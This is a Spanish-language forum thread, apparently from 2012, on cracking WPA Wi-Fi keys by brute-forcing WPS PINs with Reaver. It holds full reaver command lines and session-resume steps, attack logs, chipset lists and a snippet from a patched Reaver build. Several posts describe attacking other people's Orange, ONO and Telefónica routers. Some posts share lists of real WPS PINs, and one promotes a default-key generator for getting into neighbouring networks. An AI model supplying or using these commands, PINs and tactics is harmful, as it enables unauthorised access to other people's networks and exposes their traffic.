Publicado por: P4nd3m0n1um en 14 Noviembre 2012, 00:38 am
1.- y en que ruta se guarda????
2.- y cual es el comando para restaurarlo despues?

1.- En el escritorio.
2.- es un modulo, lo pones en la carpeta módulos.

Creo que andaba solo en wifiway, ya que en wifislax había cambiado la dirección donde se guardaba.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pepehabana en 14 Noviembre 2012, 12:52 pm
Gracias a todos por las respuestas pero donde esta la carpeta modulos???
 cual el es comando correcto porque mira que he hecho esos pasos y sigue empezando desde el principio....

Alguien sabe como guardar sesión en el REAVER PRO a lomejor alli me va mejor...

Deberían abrir un HILO con el TEMA GUARDAR SESIONES y colgar tutovideos

Saludos a todos feliz dia de huelga jajaja


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 14 Noviembre 2012, 17:45 pm
@pepehabana: muy poco necesario abrir otro hilo, el archivo es la mac address 001122334455.wpc si mal no recuerdo, este se guarda en /usr/local/etc/reaver/, si no tienes nada en esa carpeta nunca se va a guardar la sesión de reaver.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pepehabana en 15 Noviembre 2012, 00:20 am
@pepehabana: muy poco necesario abrir otro hilo, el archivo es la mac address 001122334455.wpc si mal no recuerdo, este se guarda en /usr/local/etc/reaver/, si no tienes nada en esa carpeta nunca se va a guardar la sesión de reaver.
Esa ruta /usr/local/etc/reaver/ no existe en mi WIFIWAY 3.4
Existe etc/reaver.....
YO ahí he puesto el .wpc y el .xzm..... Y nada, k mal, estoy por optar a dejar encendido el pc que realiza el ataque toda la noche hasta que inicie otra vez el router a ver si el proceso sigue....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 15 Noviembre 2012, 01:53 am
Esa ruta /usr/local/etc/reaver/ no existe en mi WIFIWAY 3.4
Existe etc/reaver.....
YO ahí he puesto el .wpc y el .xzm..... Y nada, k mal, estoy por optar a dejar encendido el pc que realiza el ataque toda la noche hasta que inicie otra vez el router a ver si el proceso sigue....

Todo en una sola imagen:

(http://i.minus.com/in7dmvhV8zXKA.png)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: linesguapo en 15 Noviembre 2012, 15:00 pm
Alguien sabe si esta tarjeta funcionara bien reaver:

linksys WMP300N v2 (AR5416+AR2133)

En teoría debería valer ya que soporta ath9k, pero si alguien la ha probado os agradecería que me comentarais que tal va.

tengo que sustituir mi antigua tarjeta que era ath5k y no tira, también admito sugerencias de tarjetas


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Rumberto en 15 Noviembre 2012, 17:01 pm
Al final la de ONO salió, tardó pero la sacó :)

Se sabe algo para las Orange-XYYY que te desconectan cuando lo detectan ?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 15 Noviembre 2012, 23:22 pm
Llevo bastante tiempo tras varias orange...y sólo me consigue coger varios pines...luego se mosquea el router y adios :D ....lo cual me hace suponer que necesitaré muuucho tiempo para obtener una wpa de orange.
Por otra parte,(por si a alguien le interesa)me ha dado por probar otra de las múltiples distros que hay,y dí con blackbuntu(me la he instalado junto con xubuntu),la cual no trae reaver "de serie" como wifiway...pero no es inconveniente,ya que se puede instalar fácilmente desde consola....y rula correctamente...por probarlo,lo hice con un ap ya "juakeado" para comprobar resultados...y son idénticos salvo en el tiempo empleado...
La primera vez lo hice con la alfa awuso36h y tardó 12 segundos....
Esta vez con la nisu EDUP y ha tardado 40 sg...pero el resultado es el que cuenta y es el mismo.
Con esto lo que quiero decir,es que reaver se puede instalar y hacerlo rular correctamente(incluído el wash) y no estar "condenados" a los lives o usb permanentemente....a riesgo de equivocarme diría que es instalable en cualquier ubuntu y por supuesto en debian.

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/Screenshot-1.png)
(http://i1156.photobucket.com/albums/p567/bassllekano/40sg.png)

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/copiadewlanxxxx.png)


Y como no me cuadraban los numeros,(por las especificaciones técnicas de esta antena edup),he vuelto a probar y ahora sí...9 segundos es mas normal en este ap  :laugh:

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/9sg.png)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 20 Noviembre 2012, 04:28 am
Al final la de ONO salió, tardó pero la sacó :)

Se sabe algo para las Orange-XYYY que te desconectan cuando lo detectan ?

orange-99c8 :18603095


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 20 Noviembre 2012, 09:24 am
Has conseguido sacar una orange a base de reaver???


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pepehabana en 20 Noviembre 2012, 14:26 pm
Bueno señoras y señores GUARDAR SESIÓN EN REAVER CON WIFIWAY 3.4.....

reaver -i mon0 -b 2C:B0:5D:XX:XX:XX -c 6 -e ONOXXXX -d 15 -vv

este lo usamos para iniciar el reaver normalmente
el reaver al tiempo de estar probando pines crea un archivo (2CB05DXXXXXX.wpc) EN ROOT damos dobleclick en la casita escritorio y lo veremos, dicho archivo lo guardamos en PENDRIVE, HDD, etc
Cuando queramos iniciar la sesión guardada debemos copiar el archivo y pegarlo en /etc/reaver.... luego el archivo .wpc en la carpeta REAVER debemos pasarlo a la consola quedando así y solo asiiiii
reaver -i mon0 -b 2C:B0:5D:XX:XX:XX -c 6 -e ONOXXXX -s /etc/reaver/2CB05DXXXXXX.wpc -d 15 -vv

He de decir que no me ha fallado
En este wifiway no hay manera con el tema modules etc etc solo esta vía me ha resultado exitosa
Espero os sirva. Salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 21 Noviembre 2012, 02:18 am
Bueno señoras y señores GUARDAR SESIÓN EN REAVER CON WIFIWAY 3.4.....

reaver -i mon0 -b 2C:B0:5D:XX:XX:XX -c 6 -e ONOXXXX -d 15 -vv

este lo usamos para iniciar el reaver normalmente
el reaver al tiempo de estar probando pines crea un archivo (2CB05DXXXXXX.wpc) EN ROOT damos dobleclick en la casita escritorio y lo veremos, dicho archivo lo guardamos en PENDRIVE, HDD, etc
Cuando queramos iniciar la sesión guardada debemos copiar el archivo y pegarlo en /etc/reaver.... luego el archivo .wpc en la carpeta REAVER debemos pasarlo a la consola quedando así y solo asiiiii
reaver -i mon0 -b 2C:B0:5D:XX:XX:XX -c 6 -e ONOXXXX -s /etc/reaver/2CB05DXXXXXX.wpc -d 15 -vv

He de decir que no me ha fallado
En este wifiway no hay manera con el tema modules etc etc solo esta vía me ha resultado exitosa
Espero os sirva. Salu2

Tal cual lo explique aquí: http://foro.elhacker.net/wireless_en_linux/reaver_vulnerabilidad_de_wpa_por_wps_habilitado-t350507.0.html;msg1801151#msg1801151


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: linesguapo en 21 Noviembre 2012, 15:22 pm
En el primer post de este hilo se especifican ciertos driver que son o no son compatibles con reaver, pero es una lista muy corta.

Que me decís  del IPW2200, el 3945 el link 5100 ...

Yo hecho pruebas con el 3945 y 5100 y athk5 aunque en todos los caso tiraba pin, con todos los router  que he probado he tenido problemas lo normal es que se me quede al 99,99 %, he probado con wifislax 4.3 y reaver 1.3 y 1.4 y con wifiway

Ya no se si es cosa de que las tajetas no son del todo compatible cosa de los router etc, aunque también he visto que otros usuarios tienen los mismos problemas sobretodo con un router con mac 8C:0C:A3 WLAN_YXYX


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 22 Noviembre 2012, 00:39 am
La lista es esta:

CHIPSETS SOPORTADOS:

Atheros AR2425 (ath5k)
Atheros AR5212
Atheros AR5213A
Atheros AR542x
Atheros AR9271 (Perfecto)
rtl8187L
rtl8187B
rtl8188ru
rtl8192cu
carl19170
ipw2000
rt2800pci
Intel 3945ABG
Intel 5100
iwl3954
iwl4965
zd1211rw

CHIPSETS CON SOPORTE PARCIAL:

ath5k
iwlagn
rtl2800usb (con compat-wireless)
b43 (Broadcom BCM4312 card)
rt73 (con driver rt2501usb)
rt2800usb (con compat-wireless-2011-12-30)
rtl819x
iwl4965
rtl8188ru
rtl8192cu

CHIPSETS NO SOPORTADOS:

iwl4965
RT3070L
Netgear WG111v3
rt2800usb (RTL3070)
rt2500
rt2570
Ipw2200
RT73usb
BCM4322
zd1211usb


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pijicatiesa en 22 Noviembre 2012, 13:44 pm
Yo para guardar la sesion desde un principio pongo el comando -s y la ruta donde quiero que se guarde y ya esta.

Por ejemplo:
reaver -i mon0 -b XX:XX:XX:XX:XX -vv -s /mnt/sdc1/ONOXXXX(El archivo donde se guarda) (/mnt/sdc1/ suele ser la ruta de mi pendrive)

Yo tengo un router vodafone con mac 64:16:0f, al pasarle el reaver, desde un primer momento me hace intentos de m5 y m6 y me da este WARNING:
got packet type 21 (0x15) half packet isnt brocken yet bla bla (o algo de eso)
Pero el caso es que sigue probando pins, alguno sabe si merece la pena seguir o desisto directamente?

PD: Los routers de ono 74:44:XX, ONOXXXX son muy vunerables, se puede poner incluso -d 0, en menos de 1 hora voy por el 15%. (Estoy a 2 metros de el XD)

Saludos!!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: slide200 en 22 Noviembre 2012, 15:48 pm
Hola
Mi router es ONO_XXYY y lleva el WPS bloqueado por defecto, he intentado atacarle mediante WpsCrackGui (con pin tanto con reaver 1.3 como con 1.4) y sale: Detecte AP rate limiting, waiting 60 seconds before re-cheking. Se supone que puedo estar tranquilo, ya que no hay ninguna manera de conseguir la clave WPA. O si la hay y debo desactivar el WPS del router?
Sé, que si el router tiene el wps desactivado no se puede hacer nada (salvo atacar con diccionario), pero si lo tengo bloqueado me queda la duda, ya que he leído mucha gente que pone la clave y el pin de routers con el wps bloqueado por defecto, y eso es lo que me hace dudar.
Gracias + Un saludo!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pijicatiesa en 22 Noviembre 2012, 16:18 pm
Hola
Mi router es ONO_XXYY y lleva el WPS bloqueado por defecto, he intentado atacarle mediante WpsCrackGui (con pin tanto con reaver 1.3 como con 1.4) y sale: Detecte AP rate limiting, waiting 60 seconds before re-cheking. Se supone que puedo estar tranquilo, ya que no hay ninguna manera de conseguir la clave WPA. O si la hay y debo desactivar el WPS del router?
Sé, que si el router tiene el wps desactivado no se puede hacer nada (salvo atacar con diccionario), pero si lo tengo bloqueado me queda la duda, ya que he leído mucha gente que pone la clave y el pin de routers con el wps bloqueado por defecto, y eso es lo que me hace dudar.
Gracias + Un saludo!

Pero supongo que antes de salirte el Detecte Ap rate limiting, ¿Prueba unas cuantas PINS?
Detecte ap rate limiting, quiere decir que tras unos intentos el router se ha bloqueado para evitar un hackeo.
Habria que ver cuanto tiempo tarda ese bloqueo, los router de orange son 5 dias, pero los de ONO?
Lei que hay algunos de ono que es solo 1 hora Ô_Ô.
Si no usas WPS, ¿Para que tenerlo activado?

Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Carpena en 22 Noviembre 2012, 16:24 pm
Sé, que si el router tiene el wps desactivado no se puede hacer nada (salvo atacar con diccionario),
si tienen la contraseña por defecto como la mayoría el programa swifi keygen es muy muy util tiene para montones de routers y operadores WLAN, ONO, jazztel.... con eso es muy rapido sacar la clave y a mi me ha servido en varias redes osea que pruebalo
aqui lo puedes hacer http://swifi-keygen.softonic.com/ (http://swifi-keygen.softonic.com/)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 22 Noviembre 2012, 20:10 pm
si tienen la contraseña por defecto como la mayoría el programa swifi keygen es muy muy util tiene para montones de routers y operadores WLAN, ONO, jazztel.... con eso es muy rapido sacar la clave y a mi me ha servido en varias redes osea que pruebalo
aqui lo puedes hacer http://swifi-keygen.softonic.com/ (http://swifi-keygen.softonic.com/)

no seria mejor que se lo descargara de la pagina del autor  :silbar:

http://www.bitsdelocos.es/category/swifi/

ya lo que faltaba por leer, softonic  >:( >:( >:(


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 22 Noviembre 2012, 23:19 pm
Has conseguido sacar una orange a base de reaver???

Pones ''ONO WPS'' en Google y aparece..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: slide200 en 23 Noviembre 2012, 03:01 am
Gracias por las respuestas.
A ver si lo he entendido, aunque tenga el router con el wps bloqueado por defecto. Si utilizo reaver 1.3 con los cuatro primeros digitos del Pin... se desbloquea y procede al ataque?? Y si utilizase reaver 1.4 (sin pin) llegaría un momento en que se desbloquearía?
Sí, lo confirmo, estoy hecho un lío!jejeje!
Gracias por lo del swifi keygen, pero en este caso no me valdría ya que cambie la contraseña por defecto. Y sé que soluciono todo con desabilitar el WPS del router, pero la curiosidad me puede, y me gustaría saberlo  ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 23 Noviembre 2012, 03:34 am
Gracias por las respuestas.
A ver si lo he entendido, aunque tenga el router con el wps bloqueado por defecto. Si utilizo reaver 1.3 con los cuatro primeros digitos del Pin... se desbloquea y procede al ataque?? Y si utilizase reaver 1.4 (sin pin) llegaría un momento en que se desbloquearía?
Sí, lo confirmo, estoy hecho un lío!jejeje!
Gracias por lo del swifi keygen, pero en este caso no me valdría ya que cambie la contraseña por defecto. Y sé que soluciono todo con desabilitar el WPS del router, pero la curiosidad me puede, y me gustaría saberlo  ;D

Si el router esta bloqueado nunca podes probar los pins, pero si das con el pin justo pueda que te de la clave. Si esta bloqueado puede tardar dias, meses, años en desbloquearse.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Carpena en 23 Noviembre 2012, 16:10 pm
Si el router esta bloqueado nunca podes probar los pins, pero si das con el pin justo pueda que te de la clave. Si esta bloqueado puede tardar dias, meses, años en desbloquearse.
Pero si te da el error del 99.99% se arregla usando reaver 1.3 o es una trola?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 23 Noviembre 2012, 19:04 pm
Pero si te da el error del 99.99% se arregla usando reaver 1.3 o es una trola?

lee esto y despues piensa lo que quieras, jeejejej

http://foro.seguridadwireless.net/live-wifislax/reaver-y-su-'bug'-del-99-99-(no-es-un-bug-aqui-lo-explico)/ (http://foro.seguridadwireless.net/live-wifislax/reaver-y-su-'bug'-del-99-99-(no-es-un-bug-aqui-lo-explico)/)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 25 Noviembre 2012, 20:28 pm
Buenas tardes, yo he probado el módulo para el router 8c:0c:a3..., y salta al 50%, con la opción "-p" y 4 dígitos, pero luego va lentísimo porque tiene que recorrer del 0000 al 9999, y se hace eterno, aparte que no guarda la sesión me he dado cuenta, esto desde el wifislax 4.2 y en usb-live, esperemos que para próximas versiones quede integrado plenamente en el sistema, curiosidad de si con este método desaparece ese presunto bug que no es tal, lo ideal sería investigar qué routers dan ese error de 99.99%, y aplicarles este parche, digámoslo así. Saludos



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 25 Noviembre 2012, 21:55 pm
Buenas tardes, yo he probado el módulo para el router 8c:0c:a3..., y salta al 50%, con la opción "-p" y 4 dígitos, pero luego va lentísimo porque tiene que recorrer del 0000 al 9999, y se hace eterno, aparte que no guarda la sesión me he dado cuenta, esto desde el wifislax 4.2 y en usb-live, esperemos que para próximas versiones quede integrado plenamente en el sistema, curiosidad de si con este método desaparece ese presunto bug que no es tal, lo ideal sería investigar qué routers dan ese error de 99.99%, y aplicarles este parche, digámoslo así. Saludos

Con el Diccionario Genérico de WPSCrackGUI podes evitarlo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 25 Noviembre 2012, 22:31 pm
Hola tengo un router de vodafone  mac 64:16:F0 y realizando el ataque me sale esto
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M6 message
  • [!] WARNING: Receive timeout occurred
  • Trying pin 84405678 va cambiando de pin y todo pero con este mensaje sacare la clave de mi router o no que opinais


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 26 Noviembre 2012, 00:09 am
@GOolden: según tacnetsol, estas muy lejos del AP, tienes que estar mas próximo, con unos -59dB.-


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: metrillo en 26 Noviembre 2012, 08:42 am
Wenas yo tengo una duda,llevo dos dias usando reaver con wifiway 3.4 cuando me aburro guardo sesion,ledoy a salvar sesion reaver,crea un archivo xzm (creo) ,ese arcgivo lo guardo en un pen,al dia siguiente al iniciar el wifiway inserto el pen cojo el archivo guardado lo coloco en elescritorio del wifiway,clico dos veces me pone algo de succesfull,escribo el comnando del reaver y me dice q si quiero seguir por donde lo deje y le doy a yes,mi pregunta es ¿realmente sigue por donde lo he dejado? quiero decir q si los pin q anteriormente ha probado el reaver se quedan guardados o tengo q coger el otro archivo q se crea con la extensión wpc o algo parecido(es donde salen los pin).El caso es q si restaura la sección por q voy por el 26,50 pero no se si vuelve a repetir los pin,solo preguntar si tengo q poner algun comando extra o no,y tambien me sale a cada rato esto:
Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Receive timeout occurred
Trying pin 84405678
 M2 message
Sending M2 message
Gracias y perdon por el tocho


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 26 Noviembre 2012, 08:52 am
El archivo wpc guarda tanto el diccionario como el estado del mismo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 26 Noviembre 2012, 18:34 pm
El router no lo tengo lejos por que yo estoy en la planta de arriba y el router esta pared con pared asin esta al lado este es el fabricante del router Shehzhen Huawei y como veis me envia un m6 y no pasa al 90% no se que pasara al final si me dara el pin ahh tengo una alfa que es la tipica que utiliza casi todo el mundo voy por el 50% va avanzando lentamente y se queda parado siempre y hay que ponerlo otra vez para otra vez vuelva a subir el porcentaje bueno saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 27 Noviembre 2012, 19:35 pm
Módulo beta3, para el error del 99.99% probado en wifislax usb-live, resultado el mismo:
Código:
[+] 99.99% completado @ 2012-11-27 11:30:23 (14 segundos/pin)
[+] Probando pin XXXX9983
[+] Enviando requirimiento EAPOL
[!] PRECAUCION: Se Recibio Tiempo De Espera Agotado
[+] Enviando requirimiento EAPOL
[+] Sending WSC NACK
[!] Fallo la transaccion WPS (code: 0x03), reintentando el ultimo pin
[+] Probando pin XXXX9982
[+] Enviando requirimiento EAPOL
[+] Received identity request
[+] Enviando respuesta de identidad
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Probando pin XXXX9981
[+] Enviando requirimiento EAPOL
[!] PRECAUCION: Se Recibio Tiempo De Espera Agotado
[+] Enviando requirimiento EAPOL
[+] Sending WSC NACK
[!] Fallo la transaccion WPS (code: 0x03), reintentando el ultimo pin
[-] Fallo al recuperar el pin WPS.
wifislax ~ # 8C:0C:A3:XX:XX:XX
bash: 8C:0C:A3:XX:XX:XX: command not found
wifislax ~ #
wifislax ~ #
Módulo, el beta3, extraído del enlace puesto por warcry, 7 post más arriba, del foro seguridad wireless, me llama la atención que no intenta los pines del xxxx9999 al xxxx9990, saludos.

P.D. Las "X" corresponden a dígitos que he ocultado por temas de privacidad.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 27 Noviembre 2012, 20:39 pm
¿has usado el -p XXXX?Parece ser que es obligatorio si usas la "nueva" modificación.
Las x corresponden a los cuatro primeros números del pin...

# sudo reaver -i eth1 -b ff:ff:ff:ff:ff --no-checksum -p XXXX -vv

Estaba pensando que si llegas al M6,entonces teóricamente los 6 primeros números del pin ya están chekeados....por lo tanto sólo quedarían 100 posibles combinaciones...desde XXXXXX00 hasta XXXXXX99...quizá probando -p xxxxxx con los 6 dígitos te funciona...lo ignoro porque no lo he probado( y ni siquiera sé si es posible hacerlo)...mas que nada porque todavía no me he encontrado con un router de estos para comprobarlo.Aunque así sería sencillísimo llegados al M7...pero tampoco hay manera por lo que he leido en google code.

En el código aportado por el autor(thanks Stefano)hay una modificación que estoy mirando con eclipse,intentando comprender qué y para qué....básicamente obliga a seguir a reaver a seguir probando pines ignorando el bug que tira del 99%...

  int i = 0, index = 0;

   /* If the first half of the pin was not specified, generate a list of possible pins */
   if(!get_static_p1())
Si no introduces la primera mitad del pin,se genera una lista con los posibles pins...y ahí es dónde creo que se produce el error,porque en esa lista generada no debe aparecer ese pin....si no,no lo entiendo.

else
   {
      /* If the first half of the pin was specified by the user, only use that */
      for(index=0; index<P1_SIZE; index++) 
      {
         set_p1(index, get_static_p1());
      }
   }

Si  la 1ª mitad del pin la especifica el usuario,se incrementa en una unidad cada petición de pin...
Etc,etc,etc.......
La sentencia else se lanza  en caso de que el anterior parámetro sea nulo y así dar una alternativa...
Aunque quizá estoy equivocado...

En fin...un rollo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 27 Noviembre 2012, 23:08 pm
Exacto he utilizado el siguiente comando:

   #reaver-wifislax -i mon0 -b 8c:0c:a3:xx:xx:xx -p XXXX -vv

Lo que no he utilizado es el parámetro "--no-checksum", "-p XXXX" son los 4 primeros dígitos obtenidos por la versión reaver standard, y que provocan el salto al 90.94% , cuando los detecta como válidos porque integran el Pin, en sus 4 primeras posiciones. También es cierto que se lleva, en casi 20 horas que me ha llevado la auditoría, 14 o 15 con el porcentaje del 99.99%, pero cambiando los pines, eso sí, pero nada, no entiendo de programación así que poco puedo aportar sobre tus comentarios sobre el código fuente.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 28 Noviembre 2012, 10:35 am
Buenas:

Por favor, si estáis testeando el reaver-wifislax de módulo para bug de 99%, os rogaría que posteáseis en su post https://foro.elhacker.net/wireless_en_linux/reaverwifislax_mod_para_problema_99-t376970.0.html

USUARINUEVO está retocandoi el código, así que por favor, id poniendo ahí los errores que observéis

Saludos

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 28 Noviembre 2012, 22:17 pm
Hola alguien ha probado el reaver modificado con la 8c:0c:a3 de telefonica o alguna livebox por que alomejor con la modificada se corrigen fallos que antes habia ahh sabeis como se mete el reaver modificado al wifislax 4.3 no se como hacerlo saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 29 Noviembre 2012, 00:21 am
Para los que andaban buscando de ONO les doy una donación:

00446747, 19482417, 31547208, 49945386, 39149138, 45445402, 6793XXXX, 6557XXXX, 4354XXXX, 04300106, 37523077, 80324560, 19756967.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 2 Diciembre 2012, 01:22 am
Hola, acabo de ver en las redes que detecto una onoXXXX con mac 84:1B:5E. Yo nunca antes habia visto esta mac en ONO. Son las nuevas que estan instalando? tiene el wps activado, sera vulnerable al ataque reaver? que fabricante es? salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 2 Diciembre 2012, 02:09 am
Hola, acabo de ver en las redes que detecto una onoXXXX con mac 84:1B:5E. Yo nunca antes habia visto esta mac en ONO. Son las nuevas que estan instalando?

NOSE..

tiene el wps activado, sera vulnerable al ataque reaver?

CLARO..

que fabricante es? salu2

NETGEAR Inc.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: vittorio en 4 Diciembre 2012, 12:45 pm
Me he bajado el bacttrack5 desde la web y no soy capaz una vez grabado que el ordenador arranque con el disco metido. Desde el BT4 arranca sin problemas. He quemado no se cuantos dvd,s y casi me doy por vencido. Quizas la descarga no la realizo correctamente o no es la version que tengo que descargar.
Tengo W7
Gracias por la ayuda


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 0x3c en 4 Diciembre 2012, 12:59 pm
esta herramienta esta un poco viejita... :rolleyes: y funciona solo bajo ciertas circunstancias...aunque debo decir que en GNU/Linux es bastante rapida..





saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ertuti en 5 Diciembre 2012, 15:16 pm
Como puedo conseguir que empiece por un numero en concreto?

la secuencia que uso actualmente es

reaver -i mon0 -b BSSID -vv


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 5 Diciembre 2012, 16:10 pm
Buenas:

@ertuti:   -p XXXX

Saludos

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: zamolxe en 6 Diciembre 2012, 12:23 pm
Hola, llevo unos dias trabajando con el Xiaopan, probando reaver ataque y todo bien hasta cuando empieza la comprobacion del pin.  trying pin 12345670 ,  trying pin 12345670 ,  trying pin 12345670 ,  el pin no cambia, siempre el mismo numero  :o . la red tiene protocolo wps activado. Algun consejo donde tengo q mirar el fallo , gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 7 Diciembre 2012, 21:31 pm
Hola hoy me aparecido una red una WLAN_XXXX mac B0:B2:DC no la habia visto nunca se ve que los de telefonica han sacado estos routers nuevos es un zyxel sabeis algo tenia el wps activado pero se lo han desactivado


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 8 Diciembre 2012, 13:34 pm
Para los que andaban buscando de ONO les doy una donación:

00446747, 19482417, 31547208, 49945386, 39149138, 45445402, 6793XXXX, 6557XXXX, 4354XXXX, 04300106, 37523077, 80324560, 19756967.

Os añado una más a las del compañero de ONO. 30599611 Estaria bien que hicieramos un POST con todas las que vayamos encontrando, especificando el modelo de router, firmware si podemos saberlo, y las tres primeras secciones del BSSID. Así quizas encontraramos algun patrón jeje  ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HCK. en 8 Diciembre 2012, 14:13 pm
Hola, llevo unos dias trabajando con el Xiaopan, probando reaver ataque y todo bien hasta cuando empieza la comprobacion del pin.  trying pin 12345670 ,  trying pin 12345670 ,  trying pin 12345670 ,  el pin no cambia, siempre el mismo numero  :o . la red tiene protocolo wps activado. Algun consejo donde tengo q mirar el fallo , gracias

Modelo del router?, deja mas datos. Estas lejos del AP?, audita con airodump a ese bssid+canal solamente, y dime los valores RXQ y PWR.

Si son malos, intenta mejorarlos acercandote al AP. Si no los comprendes, echa un ojo a la wiki de airodump-ng para comprenderlos  :D http://www.aircrack-ng.org/doku.php?id=es:airodump-ng (http://www.aircrack-ng.org/doku.php?id=es:airodump-ng) . El PWR tiene que estar por debajo de 70 mas o menos, si no.. Lo mas probable esque falle el ataque.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Snort en 8 Diciembre 2012, 18:01 pm
Muy buenas, despues de un tiempo, volvemos por el foro :D
Llevo unos dias probando el reaver con varios routers, y no entiendo por qué, al ejecutarlo se me queda siempre estancado en:

Waiting for beacon from XX:XX:XX:XX:XX
Switching mon0 to channel X
Associated with XX:XX:XX:XX:XX (ESSID: xxxxxxxx)
Trying pin 12345670
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
....

Y no termina. Tengo que decir que en una de tantas pruebas que he hecho llegó a avanzar ligeramente, hasta un 0.20%, y retomó este error de nuevo. Mi tarjeta es "semicompatible" según los listados que veo por aquí (ath5k), pero teniendo en cuenta que ha llegado a avanzar, entiendo que debería de funcionar. Como digo, he probado con varios routers, con suficiente potencia, puesto que ahora mismo estoy a 1 metro de él (y no tiene configurado pbc).
